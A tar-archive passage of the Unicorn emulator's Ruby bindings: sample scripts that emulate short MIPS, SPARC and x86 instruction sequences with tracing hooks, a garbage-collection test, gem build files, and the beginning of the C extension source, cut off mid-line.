�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_mips.rb����������������������������������������������������������0000664�0000000�0000000�00000005616�14675241067�0020630�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for MIPS of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/mips_const' include UnicornEngine # code to be emulated MIPS_CODE_EB = "\x34\x21\x34\x56" # ori $at, $at, 0x3456; MIPS_CODE_EL = "\x56\x34\x21\x34" # ori $at, $at, 0x3456; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test MIPS EB def test_mips_eb() puts("Emulate MIPS code (big-endian)") begin # Initialize emulator in MIPS32 + EB mode mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EB) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EB.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) puts(">>> r1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end # Test MIPS EL def test_mips_el() puts("Emulate MIPS code (little-endian)") begin # Initialize emulator in MIPS32 + EL mode mu = Uc.new UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, MIPS_CODE_EL) # initialize machine registers mu.reg_write(UC_MIPS_REG_1, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + MIPS_CODE_EL.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") r1 = mu.reg_read(UC_MIPS_REG_1) puts(">>> r1 = 0x%x" % r1) rescue UcError => e puts("ERROR: %s" % e) end end test_mips_eb() puts("=" * 20) test_mips_el() ������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_sparc.rb���������������������������������������������������������0000664�0000000�0000000�00000003523�14675241067�0020763�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby # Sample code for SPARC of Unicorn. 
Nguyen Anh Quynh <aquynh@gmail.com> # Ruby sample ported by Sascha Schirra <sashs82@gmail.com> require 'unicorn_engine' require 'unicorn_engine/sparc_const' include UnicornEngine # code to be emulated SPARC_CODE = "\x86\x00\x40\x02" # add %g1, %g2, %g3; # memory address where emulation starts ADDRESS = 0x10000 # callback for tracing basic blocks $hook_block = Proc.new do |uc, address, size, user_data| puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions $hook_code = Proc.new do |uc, address, size, user_data| puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # Test SPARC def test_sparc() puts("Emulate SPARC code") begin # Initialize emulator in SPARC EB mode mu = Uc.new UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, SPARC_CODE) # initialize machine registers mu.reg_write(UC_SPARC_REG_G1, 0x1230) mu.reg_write(UC_SPARC_REG_G2, 0x6789) mu.reg_write(UC_SPARC_REG_G3, 0x5555) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, $hook_block) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, $hook_code) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + SPARC_CODE.bytesize) # now puts out some registers puts(">>> Emulation done. Below is the CPU context") g3 = mu.reg_read(UC_SPARC_REG_G3) puts(">>> G3 = 0x%x" %g3) rescue UcError => e puts("ERROR: %s" % e) end end test_sparc() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/sample_x86.rb�����������������������������������������������������������0000664�0000000�0000000�00000041755�14675241067�0020311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/x86_const' include UnicornEngine X86_CODE32 = "\x41\x4a" # INC ecx; DEC edx X86_CODE32_LOOP = "\x41\x4a\xeb\xfe" # INC ecx; DEC edx; JMP self-loop X86_CODE32_MEM_READ = "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx X86_CODE32_MEM_WRITE = "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" # mov [0xaaaaaaaa], ecx; INC ecx; DEC edx X86_CODE64 = "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E\x09\x3C\x59" X86_CODE32_INOUT = "\x41\xE4\x3F\x4a\xE6\x46\x43" # INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx X86_CODE64_SYSCALL = "\x0f\x05" # SYSCALL X86_CODE16 = "\x00\x00" # add byte ptr [bx + si], al # memory address where emulation starts ADDRESS = 0x1000000 # callback for tracing basic blocks HOOK_BLOCK = Proc.new do |uc, address, size, user_data | puts(">>> Tracing basic block at 0x%x, block size = 0x%x" % [address, size]) end # callback for tracing instructions HOOK_CODE = Proc.new do |uc, address, size, user_data| 
puts(">>> Tracing instruction at 0x%x, instruction size = %u" % [address, size]) end # callback for tracing invalid memory access (READ or WRITE) HOOK_MEM_INVALID = lambda do |uc, access, address, size, value, user_data| if access == UC_MEM_WRITE_UNMAPPED puts(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) # map this memory in with 2MB in size uc.mem_map(0xaaaa0000, 2 * 1024*1024) # return True to indicate we want to continue emulation return true else puts(">>> Missing memory is being READ at 0x%x" % address) # return False to indicate we want to stop emulation return false end end # callback for tracing memory access (READ or WRITE) HOOK_MEM_ACCESS = Proc.new do |uc, access, address, size, value, user_data| if access == UC_MEM_WRITE puts(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % [address, size, value]) else # READ puts(">>> Memory is being READ at 0x%x, data size = %u" % [address, size]) end end # callback for IN instruction HOOK_IN = lambda do |uc, port, size, user_data| eip = uc.reg_read(UC_X86_REG_EIP) puts("--- reading from port 0x%x, size: %u, address: 0x%x" % [port, size, eip]) if size == 1 # read 1 byte to AL return 0xf1 end if size == 2 # read 2 byte to AX return 0xf2 end if size == 4 # read 4 byte to EAX return 0xf4 end # we should never reach here return 0 end # callback for OUT instruction HOOK_OUT = Proc.new do |uc, port, size, value, user_data| eip = uc.reg_read(UC_X86_REG_EIP) puts("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x" % [port, size, value, eip]) # confirm that value is indeed the value of AL/AX/EAX v = 0 if size == 1 # read 1 byte in AL v = uc.reg_read(UC_X86_REG_AL) end if size == 2 # read 2 bytes in AX v = uc.reg_read(UC_X86_REG_AX) end if size == 4 # read 4 bytes in EAX v = uc.reg_read(UC_X86_REG_EAX) end puts("--- register value = 0x%x" %v) end # Test X86 32 bit def test_i386() puts("Emulate i386 code") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED, HOOK_MEM_INVALID) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize) # now print out some registers puts(">>> Emulation done. 
Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) # read from memory tmp = mu.mem_read(ADDRESS, 2) print(">>> Read 2 bytes from [0x%x] =" % (ADDRESS)) tmp.each_byte { |i| print(" 0x%x" % i) } puts rescue UcError => e puts("ERROR: %s" % e) end end def test_i386_loop() puts("Emulate i386 code with infinite loop - wait for 2 seconds then stop emulation") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_LOOP) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.bytesize, 2 * UC_SECOND_SCALE) # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) rescue UcError => e puts("ERROR: %s" % e) end end def test_i386_invalid_mem_read() puts("Emulate i386 code that read from invalid memory") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_READ) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.bytesize) rescue UcError => e puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts(">>> ECX = 0x%x" % r_ecx) puts(">>> EDX = 0x%x" % r_edx) rescue UcError => e print("ERROR: %s" % e) end end def test_i386_invalid_mem_write() puts("Emulate i386 code that write to invalid memory") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_MEM_WRITE) # initialize machine registers mu.reg_write(UC_X86_REG_ECX, 0x1234) mu.reg_write(UC_X86_REG_EDX, 0x7890) # tracing all basic blocks with customized callback #mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback #mu.hook_add(UC_HOOK_CODE, HOOK_CODE) # intercept invalid memory events mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, HOOK_MEM_INVALID) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.bytesize) rescue UcError => e puts "ERROR: %s" % e end # now print out some registers puts ">>> Emulation done. 
Below is the CPU context" r_ecx = mu.reg_read(UC_X86_REG_ECX) r_edx = mu.reg_read(UC_X86_REG_EDX) puts ">>> ECX = 0x%x" % r_ecx puts ">>> EDX = 0x%x" % r_edx begin # read from memory print ">>> Read 4 bytes from [0x%x] = " % (0xaaaaaaaa) tmp = mu.mem_read(0xaaaaaaaa, 4) tmp.each_byte { |i| print(" 0x%x" % i) } puts print ">>> Read 4 bytes from [0x%x] = " % 0xffffffaa tmp = mu.mem_read(0xffffffaa, 4) tmp.each_byte { |i| puts(" 0x%x" % i) } puts rescue UcError => e puts "ERROR: %s" % e end rescue UcError => e puts "ERROR: %s" % e end end def test_i386_context_save() puts("Save/restore CPU context in opaque blob") address = 0 code = '\x40' # inc eax begin # Initialize emulator mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 8KB memory for this emulation mu.mem_map(address, 8 * 1024, UC_PROT_ALL) # write machine code to be emulated to memory mu.mem_write(address, code) # set eax to 1 mu.reg_write(UC_X86_REG_EAX, 1) puts(">>> Running emulation for the first time") mu.emu_start(address, address+1) puts(">>> Emulation done. Below is the CPU context") puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) puts(">>> Saving CPU context") saved_context = mu.context_save() puts(">>> Running emulation for the second time") mu.emu_start(address, address+1) puts(">>> Emulation done. Below is the CPU context") puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) puts(">>> CPU context restored. Below is the CPU context") mu.context_restore(saved_context) puts(">>> EAX = 0x%x" %(mu.reg_read(UC_X86_REG_EAX))) rescue UcError => e puts("ERROR: %s" % e) end end # Test X86 32 bit with IN/OUT instruction def test_i386_inout() puts("Emulate i386 code with IN/OUT instructions") begin # Initialize emulator in X86-32bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_32 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE32_INOUT) # initialize machine registers mu.reg_write(UC_X86_REG_EAX, 0x1234) mu.reg_write(UC_X86_REG_ECX, 0x6789) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions with customized callback mu.hook_add(UC_HOOK_CODE, HOOK_CODE) # handle IN & OUT instruction mu.hook_add(UC_HOOK_INSN, HOOK_IN, nil, 1, 0, UC_X86_INS_IN) mu.hook_add(UC_HOOK_INSN, HOOK_OUT, nil, 1, 0, UC_X86_INS_OUT) # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.bytesize) # now print out some registers puts(">>> Emulation done. 
Below is the CPU context") r_ecx = mu.reg_read(UC_X86_REG_ECX) r_eax = mu.reg_read(UC_X86_REG_EAX) puts ">>> EAX = 0x%x" % r_eax puts ">>> ECX = 0x%x" % r_ecx rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_64() puts("Emulate x86_64 code") begin # Initialize emulator in X86-64bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_64 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64) # initialize machine registers mu.reg_write(UC_X86_REG_RAX, 0x71f3029efd49d41d) mu.reg_write(UC_X86_REG_RBX, 0xd87b45277f133ddb) mu.reg_write(UC_X86_REG_RCX, 0xab40d1ffd8afc461) mu.reg_write(UC_X86_REG_RDX, 0x919317b4a733f01) mu.reg_write(UC_X86_REG_RSI, 0x4c24e753a17ea358) mu.reg_write(UC_X86_REG_RDI, 0xe509a57d2571ce96) mu.reg_write(UC_X86_REG_R8, 0xea5b108cc2b9ab1f) mu.reg_write(UC_X86_REG_R9, 0x19ec097c8eb618c1) mu.reg_write(UC_X86_REG_R10, 0xec45774f00c5f682) mu.reg_write(UC_X86_REG_R11, 0xe17e9dbec8c074aa) mu.reg_write(UC_X86_REG_R12, 0x80f86a8dc0f6d457) mu.reg_write(UC_X86_REG_R13, 0x48288ca5671c5492) mu.reg_write(UC_X86_REG_R14, 0x595f72f6e4017f6e) mu.reg_write(UC_X86_REG_R15, 0x1efd97aea331cccc) # setup stack mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000) # tracing all basic blocks with customized callback mu.hook_add(UC_HOOK_BLOCK, HOOK_BLOCK) # tracing all instructions in range [ADDRESS, ADDRESS+20] mu.hook_add(UC_HOOK_CODE, HOOK_CODE, 0, ADDRESS, ADDRESS+20) # tracing all memory READ & WRITE access mu.hook_add(UC_HOOK_MEM_WRITE, HOOK_MEM_ACCESS) mu.hook_add(UC_HOOK_MEM_READ, HOOK_MEM_ACCESS) # actually you can also use READ_WRITE to trace all memory access #mu.hook_add(UC_HOOK_MEM_READ | UC_HOOK_MEM_WRITE, hook_mem_access) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) rescue UcError => e puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. 
Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) rbx = mu.reg_read(UC_X86_REG_RBX) rcx = mu.reg_read(UC_X86_REG_RCX) rdx = mu.reg_read(UC_X86_REG_RDX) rsi = mu.reg_read(UC_X86_REG_RSI) rdi = mu.reg_read(UC_X86_REG_RDI) r8 = mu.reg_read(UC_X86_REG_R8) r9 = mu.reg_read(UC_X86_REG_R9) r10 = mu.reg_read(UC_X86_REG_R10) r11 = mu.reg_read(UC_X86_REG_R11) r12 = mu.reg_read(UC_X86_REG_R12) r13 = mu.reg_read(UC_X86_REG_R13) r14 = mu.reg_read(UC_X86_REG_R14) r15 = mu.reg_read(UC_X86_REG_R15) puts(">>> RAX = %d" % rax) puts(">>> RBX = %d" % rbx) puts(">>> RCX = %d" % rcx) puts(">>> RDX = %d" % rdx) puts(">>> RSI = %d" % rsi) puts(">>> RDI = %d" % rdi) puts(">>> R8 = %d" % r8) puts(">>> R9 = %d" % r9) puts(">>> R10 = %d" % r10) puts(">>> R11 = %d" % r11) puts(">>> R12 = %d" % r12) puts(">>> R13 = %d" % r13) puts(">>> R14 = %d" % r14) puts(">>> R15 = %d" % r15) #BUG mu.emu_start(ADDRESS, ADDRESS + X86_CODE64.bytesize) rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_64_syscall() puts("Emulate x86_64 code with 'syscall' instruction") begin # Initialize emulator in X86-64bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_64 # map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024) # write machine code to be emulated to memory mu.mem_write(ADDRESS, X86_CODE64_SYSCALL) hook_syscall = Proc.new do |mu, user_data| rax = mu.reg_read(UC_X86_REG_RAX) if rax == 0x100 mu.reg_write(UC_X86_REG_RAX, 0x200) else puts('ERROR: was not expecting rax=%d in syscall' % rax) end end # hook interrupts for syscall mu.hook_add(UC_HOOK_INSN, hook_syscall, nil, 1, 0, UC_X86_INS_SYSCALL) # syscall handler is expecting rax=0x100 mu.reg_write(UC_X86_REG_RAX, 0x100) begin # emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.bytesize) rescue UcError => e puts("ERROR: %s" % e) end # now print out some registers puts(">>> Emulation done. Below is the CPU context") rax = mu.reg_read(UC_X86_REG_RAX) puts(">>> RAX = 0x%x" % rax) rescue UcError => e puts("ERROR: %s" % e) end end def test_x86_16() puts("Emulate x86 16-bit code") begin # Initialize emulator in X86-16bit mode mu = Uc.new UC_ARCH_X86, UC_MODE_16 # map 8KB memory for this emulation mu.mem_map(0, 8 * 1024) # set CPU registers mu.reg_write(UC_X86_REG_EAX, 7) mu.reg_write(UC_X86_REG_EBX, 5) mu.reg_write(UC_X86_REG_ESI, 6) # write machine code to be emulated to memory mu.mem_write(0, X86_CODE16) # emulate machine code in infinite time mu.emu_start(0, X86_CODE16.bytesize) # now print out some registers puts(">>> Emulation done. 
Below is the CPU context") tmp = mu.mem_read(11, 1) puts("[0x%x] = 0x%x" % [11, tmp[0].ord]) rescue UcError => e puts("ERROR: %s" % e) end end test_i386() puts("=" * 20) test_i386_loop() puts("=" * 20) test_i386_invalid_mem_read() puts("=" * 20) test_i386_invalid_mem_write() puts("=" * 20) test_i386_context_save() puts("=" * 20) test_i386_inout() puts("=" * 20) test_x86_64() puts("=" * 20) test_x86_64_syscall() puts("=" * 20) test_x86_16() �������������������unicorn-2.1.1/bindings/ruby/sample_x86_gdt.rb�������������������������������������������������������0000664�0000000�0000000�00000004512�14675241067�0021135�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env ruby require 'unicorn_engine' require 'unicorn_engine/x86_const' include UnicornEngine F_GRANULARITY = 0x8 F_PROT_32 = 0x4 F_LONG = 0x2 F_AVAILABLE = 0x1 A_PRESENT = 0x80 A_PRIV_3 = 0x60 A_PRIV_2 = 0x40 A_PRIV_1 = 0x20 A_PRIV_0 = 0x0 A_CODE = 0x8 A_DATA = 0x0 A_TSS = 0x0 A_GATE = 0x0 A_DATA_WRITABLE = 0x2 A_CODE_READABLE = 0x2 A_DIR_CON_BIT = 0x4 S_GDT = 0x0 S_LDT = 0x4 S_PRIV_3 = 0x3 S_PRIV_2 = 0x2 S_PRIV_1 = 0x1 S_PRIV_0 = 0x0 def create_selector(idx, flags) to_ret = flags to_ret |= idx << 3 return to_ret end def create_gdt_entry(base, limit, access, flags) to_ret = limit & 0xffff; to_ret |= (base & 0xffffff) << 16; to_ret |= (access & 0xff) << 40; to_ret |= ((limit >> 16) & 0xf) << 48; to_ret |= (flags & 0xff) << 52; to_ret |= ((base >> 24) & 0xff) << 56; return [to_ret].pack('Q') end def write_gdt(uc, gdt, mem) gdt.each_index do |idx| offset = idx * GDT_ENTRY_SIZE uc.mem_write(mem + offset, gdt[idx]) end end CODE_ADDR = 0x40000 CODE_SIZE = 0x1000 GDT_ADDR = 0x3000 GDT_LIMIT = 0x1000 GDT_ENTRY_SIZE = 0x8 GS_SEGMENT_ADDR = 0x5000 GS_SEGMENT_SIZE = 0x1000 uc = Uc.new UC_ARCH_X86, UC_MODE_32 uc.mem_map(GDT_ADDR, GDT_LIMIT) uc.mem_map(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) gdt = Array.new (31) {|i| create_gdt_entry(0,0,0,0)} gdt[15] = create_gdt_entry(GS_SEGMENT_ADDR, GS_SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) gdt[16] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Data Segment gdt[17] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_CODE | A_CODE_READABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) # Code Segment gdt[18] = create_gdt_entry(0, 0xfffff000 , A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_0 | A_DIR_CON_BIT, F_PROT_32) # Stack Segment write_gdt(uc, gdt, GDT_ADDR) uc.reg_write(UC_X86_REG_GDTR, [0, GDT_ADDR, gdt.length * GDT_ENTRY_SIZE-1, 0x0]) selector = create_selector(15, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_GS, selector) selector = create_selector(16, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_DS, selector) selector = create_selector(17, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_CS, selector) selector = create_selector(18, S_GDT | S_PRIV_0) uc.reg_write(UC_X86_REG_SS, selector) 
unicorn-2.1.1/bindings/ruby/test_hook_gc.rb
#!/usr/bin/env ruby
require 'unicorn_engine'
require 'unicorn_engine/x86_const'
require 'weakref'

include UnicornEngine

X86_CODE32 = "\x41" # INC ecx

# memory address where emulation starts
ADDRESS = 0x1000000

# callback for tracing instructions
hook_code = Proc.new do |uc, address, size, user_data|
    puts("proc was run")
end

hook_code_weak = WeakRef.new hook_code

begin
    # Initialize emulator in X86-32bit mode
    mu = Uc.new UC_ARCH_X86, UC_MODE_32

    # map 2MB memory for this emulation
    mu.mem_map(ADDRESS, 2 * 1024 * 1024)

    # write machine code to be emulated to memory
    mu.mem_write(ADDRESS, X86_CODE32)

    # initialize machine registers
    mu.reg_write(UC_X86_REG_ECX, 0x1234)
    mu.reg_write(UC_X86_REG_EDX, 0x7890)

    # tracing all instructions with customized callback
    mu.hook_add(UC_HOOK_CODE, hook_code)

    hook_code = nil # erase reference to proc
    GC.start() # force garbage collection to test whether the proc is collected prematurely

    # emulate machine code in infinite time
    mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize)

    mu = nil # drop the reference to Uc so that the engine itself becomes collectable
rescue UcError => e
    puts("ERROR: %s" % e)
    exit 1
rescue NoMethodError => e
    puts("proc was garbage collected and we tried to invoke `call` on something strange")
    exit 1
end

GC.start()

if hook_code_weak.weakref_alive?() then
    puts("proc was not garbage collected")
    exit 1
end

puts "test passed"
exit 0
unicorn-2.1.1/bindings/ruby/unicorn_gem/
unicorn-2.1.1/bindings/ruby/unicorn_gem/Gemfile
source 'https://rubygems.org'
gemspec
unicorn-2.1.1/bindings/ruby/unicorn_gem/Rakefile
require "bundler/gem_tasks"
task :default => :spec
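After make install has built the extension and installed the gem, a quick smoke test confirms that the native extension loads and emulates; this sketch reuses only calls that appear in the samples above:

#!/usr/bin/env ruby
# post-install smoke test: emulate a single INC ecx and check the result
require 'unicorn_engine'
require 'unicorn_engine/x86_const'
include UnicornEngine

mu = Uc.new UC_ARCH_X86, UC_MODE_32
mu.mem_map(0x1000000, 2 * 1024 * 1024)
mu.mem_write(0x1000000, "\x41")        # INC ecx
mu.reg_write(UC_X86_REG_ECX, 0x1234)
mu.emu_start(0x1000000, 0x1000000 + 1)
raise "smoke test failed" unless mu.reg_read(UC_X86_REG_ECX) == 0x1235
puts "unicorn_engine OK"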
unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/
unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/extconf.rb
require 'mkmf'

extension_name = 'unicorn_engine'
dir_config(extension_name)
pkg_config('unicorn')
have_library('unicorn')
create_makefile(extension_name)
unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/types.h
/*
Ruby bindings for the Unicorn Emulator Engine

Copyright(c) 2016 Sascha Schirra

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ typedef struct uc_x86_float80 { uint64_t mantissa; uint16_t exponent; } uc_x86_float80; struct hook { uc_hook trace; VALUE cb; VALUE ud; VALUE rUc; }; �������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/unicorn.c�����������������������������������������������0000664�0000000�0000000�00000044542�14675241067�0022721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Ruby bindings for the Unicorn Emulator Engine Copyright(c) 2016 Sascha Schirra This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include "ruby.h" #include <unicorn/unicorn.h> #include <unicorn/x86.h> #include "unicorn.h" #include "types.h" VALUE UnicornModule = Qnil; VALUE UcClass = Qnil; VALUE UcError = Qnil; VALUE SavedContext = Qnil; VALUE Hook = Qnil; void Init_unicorn_engine(void) { rb_require("unicorn_engine/unicorn_const"); UnicornModule = rb_define_module("UnicornEngine"); UcError = rb_define_class_under(UnicornModule, "UcError", rb_eStandardError); SavedContext = rb_define_class_under(UnicornModule, "SavedContext", rb_cObject); Hook = rb_define_class_under(UnicornModule, "Hook", rb_cObject); UcClass = rb_define_class_under(UnicornModule, "Uc", rb_cObject); rb_define_method(UcClass, "initialize", m_uc_initialize, 2); rb_define_method(UcClass, "emu_start", m_uc_emu_start, -1); rb_define_method(UcClass, "emu_stop", m_uc_emu_stop, 0); rb_define_method(UcClass, "reg_read", 